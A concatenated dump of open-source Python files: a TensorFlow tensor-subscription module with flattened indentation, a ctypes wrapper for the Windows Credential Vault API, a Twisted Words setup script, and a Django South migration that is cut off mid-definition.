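def _recursive_apply_demo(values, apply_fn):
  if isinstance(values, dict):
    return {k: _recursive_apply_demo(v, apply_fn) for k, v in values.items()}
  if isinstance(values, (list, tuple)):
    mapped = [_recursive_apply_demo(v, apply_fn) for v in values]
    if type(values) in (list, tuple):
      return type(values)(mapped)
    return type(values)(*mapped)  # collections.namedtuple
  return apply_fn(values)
# The nested structure keeps its shape; only the leaves change.
assert _recursive_apply_demo({'a': [1, (2, 3)]},
                             lambda v: v * 10) == {'a': [10, (20, 30)]}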
class _ControlOutputCache(object):
"""Helper class to manage calculating and caching control_outputs in graph."""
def __init__(self):
self.cache = {}
def calc_control_outputs(self, graph):
"""Returns the map of control_outputs for a given graph.
Args:
graph: The graph to parse.
Returns:
A map of the control outputs.
"""
control_outputs = {}
for op in graph.get_operations():
for control_input in op.control_inputs:
if control_input not in control_outputs:
control_outputs[control_input] = set()
control_outputs[control_input].add(op)
return control_outputs
def get_control_outputs(self, op):
"""Return the control outputs for a given op.
Args:
op: The op to fetch control outputs for.
Returns:
Iterable of control output ops.
"""
if op.graph not in self.cache:
control_outputs = self.calc_control_outputs(op.graph)
self.cache[op.graph] = control_outputs
else:
control_outputs = self.cache[op.graph]
return control_outputs.get(op, [])
def _subscribe_new(tensor, side_effects, control_cache):
"""Helper method that subscribes a single tensor to a list of side_effects.
Args:
tensor: `tf.Tensor`
    side_effects: List of side_effect functions, see subscribe for details.
control_cache: `_ControlOutputCache` helper to get control_outputs faster.
Returns:
The modified replacement to the passed in tensor which triggers the side
effects.
"""
update_input = []
for consumer_op in list(tensor.consumers()): # explicit copy
update_input.append((consumer_op, list(consumer_op.inputs).index(tensor)))
update_control_input = control_cache.get_control_outputs(tensor.op)
# Trailing slash on name scope to replace the scope.
name_scope = tensor.op.name + '/subscription/'
with ops.name_scope(name_scope):
outs = []
for s in side_effects:
outs += s(tensor)
with ops.control_dependencies(outs):
out = array_ops.identity(tensor)
for consumer_op, index in update_input:
consumer_op._update_input(index, out) # pylint: disable=protected-access
for consumer_op in update_control_input:
consumer_op._control_inputs.remove(tensor.op) # pylint: disable=protected-access
consumer_op._control_inputs.append(out.op) # pylint: disable=protected-access
consumer_op._recompute_node_def() # pylint: disable=protected-access
return out
def _subscribe_extend(tensor, side_effects):
"""Helper method to extend the list of side_effects for a subscribed tensor.
Args:
tensor: A `tf.Tensor` as returned by subscribe().
side_effects: List of side_effect functions, see subscribe for details.
Returns:
The given subscribed tensor (for API consistency).
"""
assert len(tensor.op.inputs) == 1, 'Op {} must only have one input'.format(
tensor.op.name)
source_tensor = tensor.op.inputs[0]
# Build the side effect graphs and add their outputs to the list of control
# dependencies for the subscribed tensor.
outs = []
name_scope = source_tensor.op.name + '/subscription/'
with ops.name_scope(name_scope):
for s in side_effects:
outs += s(source_tensor)
for out in outs:
out_type = type(out)
if out_type is ops.Tensor:
out = out.op
tensor.op._control_inputs.append(out) # pylint: disable=protected-access
tensor.op._recompute_node_def() # pylint: disable=protected-access
return tensor
def _is_subscribed_identity(tensor):
"""Checks if the given tensor is an identity op returned by `subscribe()`.
Args:
tensor: A `tf.Tensor` to check.
Returns:
    True if the given tensor matches the criteria for subscription identities:
its op type is `Identity`, its name matches the name of its input and
conforms to the convention for subscribed nodes.
False otherwise.
"""
  # Subscribed tensors are assumed to be identity ops.
if tensor.op.type != 'Identity':
return False
# Check that the tensor name matches the convention in place for identity ops
# created by subscribe().
match = re.match(
r'(?P<prefix_name>^.*?)/subscription/Identity[^/]+', tensor.name)
if match is None or len(match.groups()) != 1:
return False
prefix_name = match.group('prefix_name')
# Get a reference to the source tensor and check that it has a matching name.
assert len(tensor.op.inputs) == 1, 'Op {} must only have one input'.format(
tensor.op.name)
source_tensor = tensor.op.inputs[0]
if prefix_name != source_tensor.op.name:
return False
return True
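# Illustrative sketch (not part of this module): the naming convention checked
# above, applied to a hypothetical op name 'my_op'. After subscription, the
# identity op lives under '<source op name>/subscription/'.
_sample_subscribed_name = 'my_op/subscription/Identity_1:0'
_sample_match = re.match(
    r'(?P<prefix_name>^.*?)/subscription/Identity[^/]+', _sample_subscribed_name)
assert _sample_match is not None and _sample_match.group('prefix_name') == 'my_op'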
def _subscribe(tensor, side_effects, control_cache):
"""Helper method that subscribes a single tensor to a list of side_effects.
This method will check if the given tensor has already been subscribed or if
it's a tensor returned by a previous call to `subscribe()` and, if so, will
reuse the existing identity op, appending the given side effects to the list
of existing ones.
Args:
tensor: The `tf.Tensor` to be subscribed.
side_effects: List of side_effect functions, see subscribe for details.
control_cache: `_ControlOutputCache` helper to get control_outputs faster.
Returns:
The modified replacement to the passed in tensor which triggers the side
    effects, or the given tensor if it has already been subscribed.
"""
# Check if the given tensor has a numpy compatible type (see dtypes.py).
# If not, we cannot subscribe it, so we just return the original tensor.
if not tensor.dtype.is_numpy_compatible:
    logging.debug(('Tensor {} has an unsupported {} type and cannot be '
'subscribed.').format(tensor.name, tensor.dtype))
return tensor
if _is_subscribed_identity(tensor):
return _subscribe_extend(tensor, side_effects)
# Check if the given tensor has already been subscribed by inspecting its
# outputs.
name_scope = tensor.op.name + '/subscription/Identity'
consumers = tensor.consumers()
matching_ops = [op for op in consumers if op.name.startswith(name_scope)]
assert len(matching_ops) <= 1, ('Op {} must only have one subscription '
'op connected to it').format(tensor.op.name)
if len(matching_ops) == 1:
candidate_tensor = matching_ops[0].outputs[0]
if _is_subscribed_identity(candidate_tensor):
return _subscribe_extend(candidate_tensor, side_effects)
return _subscribe_new(tensor, side_effects, control_cache)
def subscribe(tensors, side_effects):
"""Subscribe to a tensor.
This method will attach side effect graphs to a given set
of tensors. Set of tensors follows from session.run and supports
single `Tensor`, `list`, nested `list`, `tuple`, `namedtuple`, or `dict`. It
returns the tensors in the same passed in structure, but as clones with
side effects applied. The supplied side effect graphs are specified
as a constructor function which takes the target tensor and
constructs a side effect graph and returns a list of ops that should
be control dependencies on fetching the tensor. It will append
'subscription' to the name scope of the tensor for every node in
the side effect graph. These control dependencies are what trigger
the side effects. Subscribe will construct the additions to your
graph and return the created identity tensor downstream of the control
dependencies. Use these tensors as you would normally in the rest of
your tensorflow code. If a given tensor has already been subscribed or a
tensor returned by a call to subscribe is passed, the previously created
identity tensor will be reused and the side effect graphs will be added to
the existing ones.
Args:
tensors: `Tensor` or set of tensors to subscribe to. Set of tensors format
follows from `Session.run` and supports single `Tensor`, `list`, nested
`list`, `tuple`, `namedtuple`, or `dict`.
    side_effects: Function(s) that take a `Tensor`, construct a subgraph, and
      return a nonempty list of control dependencies. This can be a single
      function or a list of functions.
Returns:
Subscribed tensors, which are identity copies of the passed in tensors
in the same passed in structure, but the graph has been modified
such that these are downstream of the control dependencies for
    the side effect graphs. Use these functionally equivalent tensors
instead of the passed in tensors for further construction or running.
"""
if not hasattr(side_effects, '__iter__'):
side_effects = [side_effects]
control_outputs = _ControlOutputCache()
result = _recursive_apply(
tensors, lambda t: _subscribe(t, side_effects, control_outputs))
return result
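# Hedged usage sketch (not part of the original module): attaching a logging
# side effect with subscribe() in TF 1.x graph mode. tf.Print is used purely
# for illustration; any function returning a list of ops/tensors to run as
# control dependencies would work.
if __name__ == '__main__':
  import tensorflow as tf
  c = tf.constant(1.0) + tf.constant(2.0)
  # The side-effect function receives the source tensor and returns the ops
  # that must run whenever the subscribed tensor is fetched.
  c_sub = subscribe(c, lambda t: [tf.Print(t, [t], message='fetched c: ')])
  with tf.Session() as sess:
    sess.run(c_sub)  # logs the value of c before returning it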
|
apache-2.0
|
gibxxi/nzbToMedia
|
libs/jaraco/windows/api/credential.py
|
4
|
1290
|
"""
Support for Credential Vault
"""
import ctypes
from ctypes.wintypes import DWORD, LPCWSTR, BOOL, LPWSTR, FILETIME
try:
from ctypes.wintypes import LPBYTE
except ImportError:
LPBYTE = ctypes.POINTER(ctypes.wintypes.BYTE)
class CredentialAttribute(ctypes.Structure):
_fields_ = []
class Credential(ctypes.Structure):
_fields_ = [
('flags', DWORD),
('type', DWORD),
('target_name', LPWSTR),
('comment', LPWSTR),
('last_written', FILETIME),
('credential_blob_size', DWORD),
('credential_blob', LPBYTE),
('persist', DWORD),
('attribute_count', DWORD),
('attributes', ctypes.POINTER(CredentialAttribute)),
('target_alias', LPWSTR),
('user_name', LPWSTR),
]
def __del__(self):
ctypes.windll.advapi32.CredFree(ctypes.byref(self))
PCREDENTIAL = ctypes.POINTER(Credential)
CredRead = ctypes.windll.advapi32.CredReadW
CredRead.argtypes = (
LPCWSTR, # TargetName
DWORD, # Type
DWORD, # Flags
ctypes.POINTER(PCREDENTIAL), # Credential
)
CredRead.restype = BOOL
CredWrite = ctypes.windll.advapi32.CredWriteW
CredWrite.argtypes = (
PCREDENTIAL, # Credential
DWORD, # Flags
)
CredWrite.restype = BOOL
CredDelete = ctypes.windll.advapi32.CredDeleteW
CredDelete.argtypes = (
LPCWSTR, # TargetName
DWORD, # Type
DWORD, # Flags
)
CredDelete.restype = BOOL
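# Hedged usage sketch (not part of the original module): reading a generic
# credential from the Windows vault with the CredRead binding above.
# CRED_TYPE_GENERIC (value 1) and the target name 'example.com' are assumptions
# used only for illustration.
if __name__ == '__main__':
    CRED_TYPE_GENERIC = 1
    cred_ptr = PCREDENTIAL()
    if not CredRead('example.com', CRED_TYPE_GENERIC, 0, ctypes.byref(cred_ptr)):
        raise ctypes.WinError()
    cred = cred_ptr.contents
    # credential_blob is raw bytes of length credential_blob_size; secrets
    # written by many tools are UTF-16 encoded, but that is not guaranteed.
    blob = ctypes.string_at(cred.credential_blob, cred.credential_blob_size)
    print('%s -> %r' % (cred.user_name, blob))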
|
gpl-3.0
|
smartdata-x/robots
|
pylib/Twisted/twisted/words/topfiles/setup.py
|
22
|
1965
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
try:
from twisted.python import dist
except ImportError:
raise SystemExit("twisted.python.dist module not found. Make sure you "
"have installed the Twisted core package before "
"attempting to install any other Twisted projects.")
if __name__ == '__main__':
extraMeta = dict(
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: No Input/Output (Daemon)",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Topic :: Communications :: Chat",
"Topic :: Communications :: Chat :: AOL Instant Messenger",
"Topic :: Communications :: Chat :: ICQ",
"Topic :: Communications :: Chat :: Internet Relay Chat",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
])
dist.setup(
twisted_subproject="words",
scripts=dist.getScripts("words"),
# metadata
name="Twisted Words",
description="Twisted Words contains Instant Messaging implementations.",
author="Twisted Matrix Laboratories",
author_email="[email protected]",
maintainer="Jp Calderone",
url="http://twistedmatrix.com/trac/wiki/TwistedWords",
license="MIT",
long_description="""\
Twisted Words contains implementations of many Instant Messaging protocols,
including IRC, Jabber, OSCAR (AIM & ICQ), and some functionality for creating
bots, inter-protocol gateways, and a client application for many of the
protocols.
In support of Jabber, Twisted Words also contains X-ish, a library for
processing XML with Twisted and Python, with support for a Pythonic DOM and
an XPath-like toolkit.
""",
**extraMeta)
|
apache-2.0
|
recsm/SQP
|
sqp/migrations/0062_adding_userprofile_activation_key.py
|
1
|
24092
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserProfile.activation_key'
db.add_column('sqp_userprofile', 'activation_key', self.gf('django.db.models.fields.CharField')(default='', max_length=40, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'UserProfile.activation_key'
db.delete_column('sqp_userprofile', 'activation_key')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sqp.branch': {
'Meta': {'ordering': "('label__characteristic__name', 'label__id')", 'object_name': 'Branch'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Label']"}),
'to_characteristic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Characteristic']"})
},
'sqp.characteristic': {
'Meta': {'ordering': "['name']", 'object_name': 'Characteristic'},
'auto_fill_suggestion': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'desc': ('django.db.models.fields.TextField', [], {'db_column': "'description'", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'suggestion': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'validation_rules': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sqp.ValidationRule']", 'null': 'True', 'blank': 'True'}),
'widget': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Widget']"})
},
'sqp.characteristicset': {
'Meta': {'ordering': "['id']", 'object_name': 'CharacteristicSet'},
'branches': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sqp.Branch']", 'symmetrical': 'False'}),
'coders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sqp.coding': {
'Meta': {'ordering': "['user', 'characteristic']", 'object_name': 'Coding'},
'characteristic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Characteristic']"}),
'choice': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Question']"}),
'seconds_taken': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'updated_on': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'sqp.codingchange': {
'Meta': {'object_name': 'CodingChange'},
'change_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'change_by_user_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'change_type': ('django.db.models.fields.IntegerField', [], {}),
'characteristic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Characteristic']"}),
'coding_change_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.CodingChangeGroup']"}),
'coding_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'coding_user_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'error_occured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_value': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'new_value_by_related_country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Country']", 'null': 'True', 'blank': 'True'}),
'new_value_by_related_lang': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Language']", 'null': 'True', 'blank': 'True'}),
'processed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'processing_log': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'question_id': ('django.db.models.fields.IntegerField', [], {})
},
'sqp.codingchangegroup': {
'Meta': {'ordering': "['id']", 'object_name': 'CodingChangeGroup'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'sqp.codingsuggestion': {
'Meta': {'object_name': 'CodingSuggestion'},
'characteristic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Characteristic']"}),
'explanation': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Question']"}),
'value': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'sqp.completion': {
'Meta': {'object_name': 'Completion'},
'authorized': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'characteristic_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.CharacteristicSet']"}),
'complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'out_of_date': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'potential_improvements': ('sqp.fields.PickledObjectField', [], {'null': 'True', 'blank': 'True'}),
'predictions': ('sqp.fields.PickledObjectField', [], {'null': 'True', 'blank': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Question']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'sqp.country': {
'Meta': {'ordering': "['name']", 'object_name': 'Country'},
'iso': ('django.db.models.fields.CharField', [], {'max_length': '2', 'primary_key': 'True'}),
'iso_three': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
'sqp.faq': {
'Meta': {'object_name': 'FAQ'},
'answer': ('django.db.models.fields.TextField', [], {}),
'asker': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.TextField', [], {})
},
'sqp.history': {
'Meta': {'object_name': 'History'},
'action_description': ('django.db.models.fields.TextField', [], {}),
'action_type': ('django.db.models.fields.IntegerField', [], {}),
'actor': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {}),
'object_model': ('django.db.models.fields.CharField', [], {'max_length': '90'}),
'object_name': ('django.db.models.fields.CharField', [], {'max_length': '170'}),
'previous_values': ('django.db.models.fields.TextField', [], {}),
'time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'sqp.item': {
'Meta': {'ordering': "('study', 'admin_letter', 'admin_number', 'id')", 'object_name': 'Item'},
'admin': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '8'}),
'admin_letter': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'admin_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'created_item_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'long_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '300'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'study': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Study']"})
},
'sqp.itemgroup': {
'Meta': {'object_name': 'ItemGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'items': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sqp.Item']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
'sqp.label': {
'Meta': {'ordering': "('characteristic__name', 'id')", 'object_name': 'Label'},
'characteristic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Characteristic']"}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'compute': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'True'", 'max_length': '150'})
},
'sqp.language': {
'Meta': {'ordering': "('name',)", 'object_name': 'Language'},
'coders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'iso': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'iso2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sqp.parameter': {
'Meta': {'ordering': "['order']", 'object_name': 'Parameter'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sqp.View']", 'through': "orm['sqp.Prediction']", 'symmetrical': 'False'})
},
'sqp.prediction': {
'Meta': {'object_name': 'Prediction'},
'function_name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'paramater': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Parameter']"}),
'view': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.View']"})
},
'sqp.question': {
'Meta': {'ordering': "('item__study', 'country', 'language', 'item__admin_letter', 'item__admin_number', 'item__id')", 'object_name': 'Question'},
'answer_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Country']"}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'created_question_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imported_from': ('django.db.models.fields.CharField', [], {'max_length': '120', 'null': 'True', 'blank': 'True'}),
'introduction_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Item']"}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Language']"}),
'rel': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'rel_hi': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'rel_lo': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'relz': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'relz_se': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'rfa_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'val': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'val_hi': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'val_lo': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'valz': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'valz_se': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'})
},
'sqp.questionbulkassignments': {
'Meta': {'object_name': 'QuestionBulkAssignments'},
'assignments': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sqp.UserQuestion']", 'symmetrical': 'False', 'blank': 'True'}),
'can_edit_details': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_edit_text': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Country']", 'null': 'True'}),
'has_been_run': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.ItemGroup']", 'null': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Language']", 'null': 'True'}),
'last_run_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False'})
},
'sqp.questionbulkcreation': {
'Meta': {'object_name': 'QuestionBulkCreation'},
'copy_text_from_study': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Study']", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Country']"}),
'created_questions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sqp.Question']", 'symmetrical': 'False', 'blank': 'True'}),
'has_been_run': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.ItemGroup']"}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Language']"}),
'last_run_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'sqp.study': {
'Meta': {'ordering': "('name',)", 'object_name': 'Study'},
'coders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'created_study_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '70'})
},
'sqp.usedcountry': {
'Meta': {'ordering': "['name']", 'object_name': 'UsedCountry', 'db_table': "'vw_country_question'"},
'iso': ('django.db.models.fields.CharField', [], {'max_length': '2', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
'sqp.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'activation_key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}),
'default_characteristic_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.CharacteristicSet']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_trusted': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'key_expires': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"})
},
'sqp.userquestion': {
'Meta': {'object_name': 'UserQuestion'},
'can_edit_details': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_edit_text': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Question']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'sqp.validationrule': {
'Meta': {'object_name': 'ValidationRule'},
'failure_message': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'rule': ('django.db.models.fields.TextField', [], {}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '7'})
},
